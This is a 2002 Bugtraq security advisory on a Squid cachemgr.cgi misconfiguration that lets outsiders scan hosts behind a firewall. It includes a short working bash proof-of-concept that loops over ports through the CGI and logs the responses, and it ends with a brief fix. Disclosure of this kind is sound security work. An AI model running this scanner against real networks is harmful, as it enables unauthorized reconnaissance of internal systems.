Date: Mon, 4 Feb 2002 17:43:36 +0100
From: =?iso-8859-1?Q?Francisco_S=E1a_Mu=F1oz?= <fsaa@ip6seguridad.com.>
To: bugtraq@securityfocus.com
Subject: cachemgr.cgi (squid 2.3STABLE4)
]-* [IP6] Concept: Squid cachemgr.cgi misconfiguration
]-* [IP6] Configuration error [BID error class]
]-* [IP6] Platform investigated: Linux Redhat 6.2
Squid 2.3STABLE4
Apache 1.3.12
]-* [IP6] The problem...
Due to a misconfiguration on Apache and Squid Is posible to use
cachemgr.cgi shipped with Squid to scan hosts under the corporate firewall.
...also we can gater a lot information about the navegation,
configuration...
...also there is a lot code with bad programmer habits!
There is a lil' script to demonstrate the error, not so clean, but useful.
--- Begin nasty code miscachemgr.cgi ---
#!/bin/bash -x
# Port scanning using a misconfigured squid
# using open apache
# Usage miscachemgr host_vuln host_to_scan end_port
# Concept: Jacobo Van Leeuwen & Francisco SАa MuЯoz
# Coded by Francisco SАa MuЯoz
# IP6 [Logic Control]
PORT=1
ONE='/cgi-bin/cachemgr.cgi?host='
TWO='&port='
THREE='&user_name=&operation&auth='
mkdir from_$1_to_$2
while [ $PORT -lt $3 ]; do
# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
# $2&port=$PORT&user_name=&operation=authenticate&auth= > \
# port_$1_to_$2/$PORT.log 2>&1
lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
let PORT=PORT+1
done
--- End nasty Code ---
]-* [IP6] Solution
Deny access, configure it!
]-* [IP6] Thanks
Thanks to all IP6 staff for the good feeling.
Signed,
--
Francisco SАa MuЯoz :: Nuno Treez \(HLP\)
Security Consultant/Tiger Team
IP6 Seguridad http://www.ip6seguridad.com
--
Linux User #119288
Proud mame.dk user #115087
--
"What if I'm not elite? Ragna Gronvold says I'm special" (yes, it's from
rfp)
--
]-* [IP6] EOF
